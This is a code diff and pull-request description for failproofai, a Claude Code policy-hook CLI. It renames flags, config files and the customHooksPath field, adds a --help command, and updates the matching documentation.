-// --remove-policies [policyNames...] [--scope user|project|local|all] [--beta-only]
+// --remove-policies [policyNames...] [--scope user|project|local|all] [--beta] [--custom]
 if (args.includes("--remove-policies")) {
   const { removeHooks } = await import("../src/hooks/manager");
 
   const scopeIdx = args.indexOf("--scope");
   const scope = scopeIdx >= 0 ? args[scopeIdx + 1] : "user";
 
-  const betaOnly = args.includes("--beta-only");
+  const betaOnly = args.includes("--beta");
+  const removeCustomHooks = args.includes("--custom");
 
   const removeIdx = args.indexOf("--remove-policies");
   const policyNames = args
@@ -90,7 +127,7 @@ if (args.includes("--remove-policies")) {
     policyNames.length > 0 ? policyNames : undefined,
     scope,
     undefined,
-    { betaOnly },
+    { betaOnly, removeCustomHooks },
   );
   process.exit(0);
 }
@@ -103,8 +140,9 @@ if (args.includes("--list-policies")) {
 }
 
 // Unknown flag guard — must appear after all known-flag branches
-const knownFlags = ["--version", "-v", "--hook", "--install-policies",
-                    "--remove-policies", "--list-policies"];
+const knownFlags = ["--version", "-v", "--help", "-h", "--hook",
+                    "--install-policies", "--remove-policies", "--list-policies",
+                    "--scope", "--beta", "--custom"];
 const unknownFlag = args.find(a => a.startsWith("-") && !knownFlags.includes(a));
 
 if (unknownFlag) {
@@ -121,7 +159,7 @@ if (unknownFlag) {
     return dp[m][n];
   }
 
-  const primary = ["--version", "--hook", "--install-policies",
+  const primary = ["--version", "--help", "--hook", "--install-policies",
                    "--remove-policies", "--list-policies"];
   const closest = primary.reduce((best, flag) => {
     const dist = levenshtein(unknownFlag, flag);
@@ -130,6 +168,7 @@ if (unknownFlag) {
 
   console.error(`Unknown flag: ${unknownFlag}`);
   console.error(`Did you mean: ${closest.flag}?`);
+  console.error(`Run \`failproofai --help\` for usage details.`);
   process.exit(1);
 }
 

--- a/docs/architecture.md
+++ b/docs/architecture.md
@@ -108,7 +108,7 @@ stdin JSON
   → extract session metadata (session_id, cwd, tool_name, tool_input, etc.)
   → readMergedHooksConfig(cwd)    ← merges project + local + global config
   → register enabled builtin policies with resolved params
-  → load custom hooks from customHooksPath (if set)
+  → load custom hooks from customPoliciesPath (if set)
   → register custom hooks into policy registry
   → evaluate all policies (builtins first, then custom)
       → first deny short-circuits
@@ -127,15 +127,15 @@ The entire process runs in under 100ms for typical payloads with no LLM calls.
 `src/hooks/hooks-config.ts` implements three-scope config loading.
 
 ```
-[1] {cwd}/.failproofai/hooks-config.json        ← project  (highest priority)
-[2] {cwd}/.failproofai/hooks-config.local.json  ← local
-[3] ~/.failproofai/hooks-config.json             ← global   (lowest priority)
+[1] {cwd}/.failproofai/policies-config.json        ← project  (highest priority)
+[2] {cwd}/.failproofai/policies-config.local.json  ← local
+[3] ~/.failproofai/policies-config.json             ← global   (lowest priority)
 ```
 
 Merge logic:
 - `enabledPolicies` — deduplicated union across all three files
 - `policyParams` — per-policy key, first file that defines it wins entirely
-- `customHooksPath` — first file that defines it wins
+- `customPoliciesPath` — first file that defines it wins
 - `llm` — first file that defines it wins
 
 The web dashboard uses `readHooksConfig()` (global only) for reading and writing, since it is not invoked with a project cwd.
@@ -206,7 +206,7 @@ export function clearCustomHooks(): void { ... }  // used in tests
 
 `src/hooks/custom-hooks-loader.ts` loads the user's hooks file:
 
-1. Read `customHooksPath` from config; skip if absent.
+1. Read `customPoliciesPath` from config; skip if absent.
 2. Resolve to absolute path; check file exists.
 3. Rewrite all `from "failproofai"` imports to the actual dist path so `customPolicies` resolves to the same `globalThis` registry.
 4. Recursively rewrite transitive local imports to ensure ESM compatibility.

--- a/docs/cli-reference.md
+++ b/docs/cli-reference.md
@@ -66,7 +66,7 @@ Writes hook entries into Claude Code's `settings.json` so that failproofai inter
 | `--scope user` | Install into `~/.claude/settings.json` (default — all sessions) |
 | `--scope project` | Install into `.claude/settings.json` in the current directory |
 | `--scope local` | Install into `.claude/settings.local.json` in the current directory |
-| `--custom-hooks <path>` | Path to a JS file containing custom hook policies |
+| `--custom <path>` | Path to a JS file containing custom hook policies |
 | `--beta` | Include beta policies in installation |
 
 **Examples:**
@@ -79,10 +79,10 @@ failproofai --install-policies
 failproofai --install-policies block-sudo sanitize-api-keys --scope project
 
 # Install with a custom hooks file
-failproofai --install-policies --custom-hooks ./my-policies.js
+failproofai --install-policies --custom ./my-policies.js
 ```
 
-When `--custom-hooks <path>` is provided, the resolved absolute path is saved to `hooks-config.json` as `customHooksPath`. The file is loaded and executed at hook-fire time (not at install time).
+When `--custom <path>` is provided, the resolved absolute path is saved to `policies-config.json` as `customPoliciesPath`. The file is loaded and executed at hook-fire time (not at install time).
 
 ---
 
@@ -102,7 +102,7 @@ Removes failproofai hook entries from Claude Code's `settings.json`.
 | `--scope project` | Remove from project settings |
 | `--scope local` | Remove from local settings |
 | `--scope all` | Remove from all scopes |
-| `--remove-custom-hooks` | Clear the `customHooksPath` from config |
+| `--custom` | Clear the `customPoliciesPath` from config |
 
 **Examples:**
 
@@ -114,7 +114,7 @@ failproofai --remove-policies
 failproofai --remove-policies block-sudo
 
 # Remove custom hooks path
-failproofai --remove-policies --remove-custom-hooks
+failproofai --remove-policies --custom
 ```
 
 ---

--- a/docs/configuration.md
+++ b/docs/configuration.md
@@ -10,9 +10,9 @@ There are three configuration scopes, evaluated in priority order:
 
 | Scope | File path | Purpose |
 |-------|-----------|---------|
-| **project** | `.failproofai/hooks-config.json` | Per-repo settings, committed to version control |
-| **local** | `.failproofai/hooks-config.local.json` | Personal per-repo overrides, gitignored |
-| **global** | `~/.failproofai/hooks-config.json` | User-level defaults across all projects |
+| **project** | `.failproofai/policies-config.json` | Per-repo settings, committed to version control |
+| **local** | `.failproofai/policies-config.local.json` | Personal per-repo overrides, gitignored |
+| **global** | `~/.failproofai/policies-config.json` | User-level defaults across all projects |
 
 When failproofai receives a hook event, it loads and merges all three files that exist for the current working directory.
 
@@ -45,7 +45,7 @@ global:   block-sudo → { allowPatterns: ["sudo systemctl status"] }
 resolved: { allowPatterns: ["sudo systemctl status"] }  ← falls through to global
 ```
 
-**`customHooksPath`** — first scope that defines it wins.
+**`customPoliciesPath`** — first scope that defines it wins.
 
 **`llm`** — first scope that defines it wins.
 
@@ -86,7 +86,7 @@ resolved: { allowPatterns: ["sudo systemctl status"] }  ← falls through to glo
       "thresholdKb": 512
     }
   },
-  "customHooksPath": "/home/alice/myproject/my-policies.js"
+  "customPoliciesPath": "/home/alice/myproject/my-policies.js"
 }
 ```
 
@@ -112,11 +112,11 @@ If a policy has parameters but you don't specify them, the policy's built-in def
 
 Unknown keys inside a policy's params block are silently ignored at hook-fire time but flagged as warnings when you run `failproofai --list-policies`.
 
-### `customHooksPath`
+### `customPoliciesPath`
 
 Type: `string` (absolute path)
 
-Path to a JavaScript file containing custom hook policies. This is set automatically by `failproofai --install-policies --custom-hooks <path>` (the path is resolved to absolute before being stored).
+Path to a JavaScript file containing custom hook policies. This is set automatically by `failproofai --install-policies --custom <path>` (the path is resolved to absolute before being stored).
 
 The file is loaded fresh on every hook event — there is no caching. See [Custom Hooks](./custom-hooks.md) for authoring details.
 
@@ -139,18 +139,18 @@ LLM client configuration for policies that make AI calls. Not required for most 
 
 ## Managing configuration from the CLI
 
-The `--install-policies` and `--remove-policies` commands write to Claude Code's `settings.json` (the hook entry points), while `hooks-config.json` is the file you manage directly. The two are separate:
+The `--install-policies` and `--remove-policies` commands write to Claude Code's `settings.json` (the hook entry points), while `policies-config.json` is the file you manage directly. The two are separate:
 
 - **`settings.json`** — tells Claude Code to call `failproofai --hook <event>` on each tool use
-- **`hooks-config.json`** — tells failproofai which policies to evaluate and with what params
+- **`policies-config.json`** — tells failproofai which policies to evaluate and with what params
 
-You can edit `hooks-config.json` directly at any time; changes take effect immediately on the next hook event with no restart needed.
+You can edit `policies-config.json` directly at any time; changes take effect immediately on the next hook event with no restart needed.
 
 ---
 
 ## Example: project-level config with team defaults
 
-Commit `.failproofai/hooks-config.json` to your repo:
+Commit `.failproofai/policies-config.json` to your repo:
 
 ```json
 {
@@ -169,4 +169,4 @@ Commit `.failproofai/hooks-config.json` to your repo:
 }
 ```
 
-Each developer can then create `.failproofai/hooks-config.local.json` (gitignored) for personal overrides without affecting teammates.
+Each developer can then create `.failproofai/policies-config.local.json` (gitignored) for personal overrides without affecting teammates.

--- a/docs/custom-hooks.md
+++ b/docs/custom-hooks.md
@@ -28,7 +28,7 @@ customPolicies.add({
 Install it:
 
 ```bash
-failproofai --install-policies --custom-hooks ./my-policies.js
+failproofai --install-policies --custom ./my-policies.js
 ```
 
 ---
@@ -37,16 +37,16 @@ failproofai --install-policies --custom-hooks ./my-policies.js
 
 ```bash
 # Install with a custom hooks file
-failproofai --install-policies --custom-hooks ./my-policies.js
+failproofai --install-policies --custom ./my-policies.js
 
 # Replace the hooks file path
-failproofai --install-policies --custom-hooks ./new-policies.js
+failproofai --install-policies --custom ./new-policies.js
 
 # Remove the custom hooks path from config
-failproofai --remove-policies --remove-custom-hooks
+failproofai --remove-policies --custom
 ```
 
-The resolved absolute path is stored in `hooks-config.json` as `customHooksPath`. The file is loaded fresh on every hook event — there is no caching between events.
+The resolved absolute path is stored in `policies-config.json` as `customPoliciesPath`. The file is loaded fresh on every hook event — there is no caching between events.
 
 ---
 
@@ -172,7 +172,7 @@ Custom hooks are **fail-open**: errors never block built-in policies or crash th
 
 | Failure | Behavior |
 |---------|----------|
-| `customHooksPath` not set | No custom hooks run; built-ins continue normally |
+| `customPoliciesPath` not set | No custom hooks run; built-ins continue normally |
 | File not found | Warning logged to `~/.failproofai/hook.log`; built-ins continue |
 | Syntax/import error | Error logged to `~/.failproofai/hook.log`; all custom hooks skipped |
 | `fn` throws at runtime | Error logged; that hook treated as `allow`; other hooks continue |
@@ -253,5 +253,5 @@ The `examples/` directory contains ready-to-run hook files:
 Install the basic examples:
 
 ```bash
-failproofai --install-policies --custom-hooks ./examples/policies-basic.js
+failproofai --install-policies --custom ./examples/policies-basic.js
 ```

--- a/docs/dashboard.md
+++ b/docs/dashboard.md
@@ -65,7 +65,7 @@ A two-tab page for managing policies and reviewing activity.
 
 **Policies tab:**
 
-- Toggle individual policies on or off with a single click (writes to `~/.failproofai/hooks-config.json`)
+- Toggle individual policies on or off with a single click (writes to `~/.failproofai/policies-config.json`)
 - Expand a policy to configure its parameters (for policies that support `policyParams`)
 - Install or remove hooks for a given scope
 - Set a custom hooks file path

--- a/docs/getting-started.md
+++ b/docs/getting-started.md
@@ -89,11 +89,11 @@ failproofai stores all configuration and logs locally:
 
 | Path | Contents |
 |------|----------|
-| `~/.failproofai/hooks-config.json` | Global policy configuration |
+| `~/.failproofai/policies-config.json` | Global policy configuration |
 | `~/.failproofai/hook-activity.jsonl` | Hook execution history (one JSON line per event) |
 | `~/.failproofai/hook.log` | Debug log for custom hook errors |
-| `.failproofai/hooks-config.json` | Per-project policy configuration (committed) |
-| `.failproofai/hooks-config.local.json` | Per-project personal overrides (gitignored) |
+| `.failproofai/policies-config.json` | Per-project policy configuration (committed) |
+| `.failproofai/policies-config.local.json` | Per-project personal overrides (gitignored) |
 
 ---
 

--- a/docs/index.md
+++ b/docs/index.md
@@ -43,5 +43,5 @@ failproofai --list-policies
 
 **Add a custom policy file:**
 ```bash
-failproofai --install-policies --custom-hooks ./my-policies.js
+failproofai --install-policies --custom ./my-policies.js
 ```

--- a/docs/testing.md
+++ b/docs/testing.md
@@ -147,7 +147,7 @@ __tests__/e2e/
 import { createFixtureEnv } from "../helpers/fixture-env";
 
 const env = createFixtureEnv();
-// env.cwd    — temp dir; pass as payload.cwd to pick up .failproofai/hooks-config.json
+// env.cwd    — temp dir; pass as payload.cwd to pick up .failproofai/policies-config.json
 // env.home   — isolated home dir; no real ~/.failproofai leaks in
 
 env.writeConfig({

--- a/scripts/postinstall.mjs
+++ b/scripts/postinstall.mjs
@@ -30,7 +30,7 @@ function hashToId(raw) {
  * @returns {{ configured: boolean, registered: boolean, policyCount: number }}
  */
 function checkHooks() {
-  const hooksConfigPath = resolve(homedir(), ".failproofai", "hooks-config.json");
+  const hooksConfigPath = resolve(homedir(), ".failproofai", "policies-config.json");
   if (!existsSync(hooksConfigPath)) {
     return { configured: false, registered: false, policyCount: 0 };
   }

--- a/src/hooks/custom-hooks-loader.ts
+++ b/src/hooks/custom-hooks-loader.ts
@@ -16,18 +16,18 @@ import type { CustomHook } from "./policy-types";
 const LOADING_KEY = "__FAILPROOFAI_LOADING_HOOKS__";
 
 export async function loadCustomHooks(
-  customHooksPath: string | undefined,
+  customPoliciesPath: string | undefined,
   opts?: { strict?: boolean },
 ): Promise<CustomHook[]> {
-  if (!customHooksPath) return [];
+  if (!customPoliciesPath) return [];
 
-  const absPath = isAbsolute(customHooksPath)
-    ? customHooksPath
-    : resolve(process.cwd(), customHooksPath);
+  const absPath = isAbsolute(customPoliciesPath)
+    ? customPoliciesPath
+    : resolve(process.cwd(), customPoliciesPath);
 
   if (!existsSync(absPath)) {
     if (opts?.strict) throw new Error(`Custom hooks file not found: ${absPath}`);
-    hookLogWarn(`customHooksPath not found: ${absPath}`);
+    hookLogWarn(`customPoliciesPath not found: ${absPath}`);
     return [];
   }
 

--- a/src/hooks/handler.ts
+++ b/src/hooks/handler.ts
@@ -2,7 +2,7 @@
  * Hook event handler — invoked when Claude Code triggers a hook.
  *
  * Reads the JSON payload from stdin, loads enabled policies from
- * ~/.failproofai/hooks-config.json, evaluates matching policies, persists
+ * ~/.failproofai/policies-config.json, evaluates matching policies, persists
  * activity to disk, and returns the appropriate exit code + stdout response.
  */
 import type { HookEventType, SessionMetadata } from "./types";
@@ -71,7 +71,7 @@ export async function handleHookEvent(eventType: string): Promise<number> {
   registerBuiltinPolicies(config.enabledPolicies);
 
   // Load and register custom hooks (layer 2, after builtins)
-  const customHooksList = await loadCustomHooks(config.customHooksPath);
+  const customHooksList = await loadCustomHooks(config.customPoliciesPath);
   for (const hook of customHooksList) {
     const hookName = hook.name;
     const fn: PolicyFunction = async (ctx): Promise<PolicyResult> => {

--- a/src/hooks/hooks-config.ts
+++ b/src/hooks/hooks-config.ts
@@ -1,5 +1,5 @@
 /**
- * Read/write the hooks configuration file at ~/.failproofai/hooks-config.json.
+ * Read/write the hooks configuration file at ~/.failproofai/policies-config.json.
  */
 import { readFileSync, writeFileSync, existsSync, mkdirSync } from "node:fs";
 import { resolve, dirname } from "node:path";
@@ -20,21 +20,21 @@ function readConfigAt(path: string): Partial<HooksConfig> {
 
 /**
  * Read and merge hooks config from three scopes in priority order:
- *   1. {cwd}/.failproofai/hooks-config.json        (project)
- *   2. {cwd}/.failproofai/hooks-config.local.json  (local)
- *   3. ~/.failproofai/hooks-config.json             (global)
+ *   1. {cwd}/.failproofai/policies-config.json        (project)
+ *   2. {cwd}/.failproofai/policies-config.local.json  (local)
+ *   3. ~/.failproofai/policies-config.json             (global)
  *
  * Merge rules:
  *   enabledPolicies: union + dedup across all three
  *   policyParams:    per-policy key, first scope that defines it wins entirely
- *   customHooksPath: first scope that defines it wins
+ *   customPoliciesPath: first scope that defines it wins
  *   llm:            first scope that defines it wins
  */
 export function readMergedHooksConfig(cwd?: string): HooksConfig {
   const base = cwd ? resolve(cwd) : process.cwd();
-  const projectPath = resolve(base, ".failproofai", "hooks-config.json");
-  const localPath = resolve(base, ".failproofai", "hooks-config.local.json");
-  const globalPath = resolve(homedir(), ".failproofai", "hooks-config.json");
+  const projectPath = resolve(base, ".failproofai", "policies-config.json");
+  const localPath = resolve(base, ".failproofai", "policies-config.local.json");
+  const globalPath = resolve(homedir(), ".failproofai", "policies-config.json");
 
   const project = readConfigAt(projectPath);
   const local = readConfigAt(localPath);
@@ -58,9 +58,9 @@ export function readMergedHooksConfig(cwd?: string): HooksConfig {
     }
   }
 
-  // customHooksPath: first scope wins
-  const customHooksPath =
-    project.customHooksPath ?? local.customHooksPath ?? global_.customHooksPath;
+  // customPoliciesPath: first scope wins
+  const customPoliciesPath =
+    project.customPoliciesPath ?? local.customPoliciesPath ?? global_.customPoliciesPath;
 
   // llm: first scope wins
   const llm = project.llm ?? local.llm ?? global_.llm;
@@ -68,13 +68,13 @@ export function readMergedHooksConfig(cwd?: string): HooksConfig {
   return {
     enabledPolicies: [...enabledSet],
     ...(Object.keys(mergedParams).length > 0 ? { policyParams: mergedParams } : {}),
-    ...(customHooksPath !== undefined ? { customHooksPath } : {}),
+    ...(customPoliciesPath !== undefined ? { customPoliciesPath } : {}),
     ...(llm !== undefined ? { llm } : {}),
   };
 }
 
 function getConfigPath(): string {
-  return resolve(homedir(), ".failproofai", "hooks-config.json");
+  return resolve(homedir(), ".failproofai", "policies-config.json");
 }
 
 export function readHooksConfig(): HooksConfig {

--- a/src/hooks/llm-client.ts
+++ b/src/hooks/llm-client.ts
@@ -2,7 +2,7 @@
  * Shared OpenAI-compatible chat completions client.
  *
  * Uses raw `fetch` — no SDK dependency. Any policy can import this
- * to make LLM calls using the shared configuration from hooks-config.json
+ * to make LLM calls using the shared configuration from policies-config.json
  * or environment variables.
  */
 import { readLlmConfig } from "./hooks-config";
@@ -35,7 +35,7 @@ export async function chatCompletion(
   const config = readLlmConfig();
   if (!config) {
     throw new Error(
-      "No LLM API key configured. Set FAILPROOFAI_LLM_API_KEY or configure llm.apiKey in hooks-config.json",
+      "No LLM API key configured. Set FAILPROOFAI_LLM_API_KEY or configure llm.apiKey in policies-config.json",
     );
   }
 

--- a/src/hooks/manager.ts
+++ b/src/hooks/manager.ts
@@ -182,7 +182,7 @@ export async function installHooks(
   cwd?: string,
   includeBeta = false,
   source?: string,
-  customHooksPath?: string,
+  customPoliciesPath?: string,
   removeCustomHooks = false,
 ): Promise<void> {
   const binaryPath = resolveFailproofaiBinary();
@@ -212,23 +212,23 @@ export async function installHooks(
     selectedPolicies = await promptPolicySelection(preSelected, { includeBeta });
   }
 
-  // Preserve existing config fields (policyParams, customHooksPath, llm) when updating
+  // Preserve existing config fields (policyParams, customPoliciesPath, llm) when updating
   const configToWrite = { ...previousConfig, enabledPolicies: selectedPolicies };
   if (removeCustomHooks) {
-    delete configToWrite.customHooksPath;
-  } else if (customHooksPath) {
-    configToWrite.customHooksPath = resolve(customHooksPath);
+    delete configToWrite.customPoliciesPath;
+  } else if (customPoliciesPath) {
+    configToWrite.customPoliciesPath = resolve(customPoliciesPath);
     // Validate the file before committing it to config
     let validatedHooks: Awaited<ReturnType<typeof loadCustomHooks>> = [];
     try {
-      validatedHooks = await loadCustomHooks(configToWrite.customHooksPath, { strict: true });
+      validatedHooks = await loadCustomHooks(configToWrite.customPoliciesPath, { strict: true });
     } catch (err) {
       console.error(`Error: ${err instanceof Error ? err.message : String(err)}`);
       process.exit(1);
     }
     if (validatedHooks.length === 0) {
       console.error(
-        `Error: no hooks registered in ${customHooksPath}. ` +
+        `Error: no hooks registered in ${customPoliciesPath}. ` +
           `Make sure your file calls customPolicies.add(...) at least once.`,
       );
       process.exit(1);
@@ -241,8 +241,8 @@ export async function installHooks(
   console.log(`\nEnabled ${selectedPolicies.length} policy(ies): ${selectedPolicies.join(", ")}`);
   if (removeCustomHooks) {
     console.log("Custom hooks path cleared.");
-  } else if (configToWrite.customHooksPath) {
-    console.log(`Custom hooks path: ${configToWrite.customHooksPath}`);
+  } else if (configToWrite.customPoliciesPath) {
+    console.log(`Custom hooks path: ${configToWrite.customPoliciesPath}`);
   }
 
   const settingsPath = getSettingsPath(scope, cwd);
@@ -306,7 +306,7 @@ export async function installHooks(
       arch: arch(),
       os_release: release(),
       hostname_hash: hashToId(hostname()),
-      has_custom_hooks_path: !!(configToWrite.customHooksPath),
+      has_custom_hooks_path: !!(configToWrite.customPoliciesPath),
       has_policy_params: !!(configToWrite.policyParams && Object.keys(configToWrite.policyParams).length > 0),
       param_policy_names: configToWrite.policyParams ? Object.keys(configToWrite.policyParams) : [],
     });
@@ -340,7 +340,15 @@ export async function installHooks(
  * @param scope — settings scope to remove from (default: "user"), or "all" to remove from all scopes
  * @param opts.betaOnly — set to true when removing only beta policies (adds beta_only flag to telemetry)
  */
-export async function removeHooks(policyNames?: string[], scope: HookScope | "all" = "user", cwd?: string, opts?: { betaOnly?: boolean; source?: string }): Promise<void> {
+export async function removeHooks(policyNames?: string[], scope: HookScope | "all" = "user", cwd?: string, opts?: { betaOnly?: boolean; source?: string; removeCustomHooks?: boolean }): Promise<void> {
+  // Clear custom hooks path if requested
+  if (opts?.removeCustomHooks) {
+    const config = readHooksConfig();
+    delete config.customPoliciesPath;
+    writeHooksConfig(config);
+    console.log("Custom hooks path cleared.");
+  }
+
   // Remove specific policies from config (keep hooks installed)
   if (policyNames && policyNames.length > 0 && !(policyNames.length === 1 && policyNames[0] === "all")) {
     validatePolicyNames(policyNames);
@@ -452,7 +460,7 @@ export async function removeHooks(policyNames?: string[], scope: HookScope | "al
   // Clear policy config when removing from all scopes, or when no hooks remain in any scope
   if (scope === "all" || !HOOK_SCOPES.some((s) => hooksInstalledInSettings(s, cwd))) {
     const existingForClear = readHooksConfig();
-    const { customHooksPath: _drop, policyParams: _dropParams, ...restClear } = existingForClear;
+    const { customPoliciesPath: _drop, policyParams: _dropParams, ...restClear } = existingForClear;
     writeHooksConfig({ ...restClear, enabledPolicies: [] });
   }
 }
@@ -467,7 +475,7 @@ export async function removeHooks(policyNames?: string[], scope: HookScope | "al
  * Also shows:
  *   - Configured policyParams values beneath each policy
  *   - Warnings for unknown policyParams keys
- *   - Custom Hooks section if customHooksPath is set
+ *   - Custom Hooks section if customPoliciesPath is set
  */
 export async function listHooks(cwd?: string): Promise<void> {
   const config = readMergedHooksConfig(cwd);
@@ -524,7 +532,7 @@ export async function listHooks(cwd?: string): Promise<void> {
     } else {
       console.log("\n  Run `failproofai --install-policies` to get started.");
     }
-    console.log("  Config: ~/.failproofai/hooks-config.json\n");
+    console.log("  Config: ~/.failproofai/policies-config.json\n");
   } else if (installedScopes.length === 1) {
     // State B: Single scope — table with header row
     const scope = installedScopes[0];
@@ -536,7 +544,7 @@ export async function listHooks(cwd?: string): Promise<void> {
     for (const policy of regularPolicies) printSimpleRow(policy);
     printBetaSection(printSimpleRow);
 
-    console.log("\n  Config: ~/.failproofai/hooks-config.json\n");
+    console.log("\n  Config: ~/.failproofai/policies-config.json\n");
   } else {
     // State C: Multiple scopes — column table
     const COL = 9;
@@ -580,7 +588,7 @@ export async function listHooks(cwd?: string): Promise<void> {
       for (const policy of betaPolicies) printMultiScopeRow(policy);
     }
 
-    console.log("\n  Config: ~/.failproofai/hooks-config.json");
+    console.log("\n  Config: ~/.failproofai/policies-config.json");
 
     // Multi-scope warning
     const scopeNames = installedScopes.join(", ");
@@ -599,12 +607,12 @@ export async function listHooks(cwd?: string): Promise<void> {
   }
 
   // Custom Policies section
-  if (config.customHooksPath) {
-    console.log(`\n  \u2500\u2500 Custom Policies (${config.customHooksPath}) \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500`);
-    if (!existsSync(config.customHooksPath)) {
-      console.log(`  \x1B[31m\u2717 File not found: ${config.customHooksPath}\x1B[0m`);
+  if (config.customPoliciesPath) {
+    console.log(`\n  \u2500\u2500 Custom Policies (${config.customPoliciesPath}) \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500`);
+    if (!existsSync(config.customPoliciesPath)) {
+      console.log(`  \x1B[31m\u2717 File not found: ${config.customPoliciesPath}\x1B[0m`);
     } else {
-      const hooks = await loadCustomHooks(config.customHooksPath);
+      const hooks = await loadCustomHooks(config.customPoliciesPath);
       if (hooks.length === 0) {
         console.log(`  \x1B[31m\u2717 ERR  failed to load (check ~/.failproofai/logs/hooks.log)\x1B[0m`);
       } else {

--- a/src/hooks/policy-types.ts
+++ b/src/hooks/policy-types.ts
@@ -73,5 +73,5 @@ export interface HooksConfig {
   enabledPolicies: string[];
   llm?: LlmConfig;
   policyParams?: Record<string, Record<string, unknown>>;
-  customHooksPath?: string;
+  customPoliciesPath?: string;
 }


### PR DESCRIPTION
## Summary

- **`--custom-hooks` → `--custom`** for `--install-policies`; **`--remove-custom-hooks` → `--custom`** moved to `--remove-policies`
- **`--beta-only` → `--beta`** for `--remove-policies` (consistent with install)
- **`customHooksPath` → `customPoliciesPath`** across all source, tests, and docs
- **`hooks-config.json` → `policies-config.json`** (and `hooks-config.local.json` → `policies-config.local.json`) in all path references
- **`--help` / `-h`** command added with full usage output
- Unknown flag error now appends: `Run \`failproofai --help\` for usage details.`

## Test plan

- [ ] `failproofai --help` prints full usage and exits 0
- [ ] `failproofai -h` same
- [ ] `failproofai --install-policies --custom ./my-policies.js` sets `customPoliciesPath` in `policies-config.json`
- [ ] `failproofai --remove-policies --custom` clears `customPoliciesPath`
- [ ] `failproofai --remove-policies --beta` removes only beta policies
- [ ] Unknown flag (e.g. `--foo`) prints did-you-mean + help hint
- [ ] Existing unit and e2e tests pass

🤖 Generated with [Claude Code](https://claude.com/claude-code)

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->

## Summary by CodeRabbit

* **New Features**
  * Added `--help` / `-h` command to display CLI usage and examples.

* **Breaking Changes**
  * Configuration files renamed: `hooks-config.json` → `policies-config.json`
  * Configuration field renamed: `customHooksPath` → `customPoliciesPath`
  * CLI flag renamed: `--custom-hooks` → `--custom` (for `--install-policies`)
  * CLI flag renamed: `--remove-custom-hooks` → `--custom` (for `--remove-policies`)

* **Documentation**
  * Updated all guides, CLI reference, and configuration documentation to reflect naming changes.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->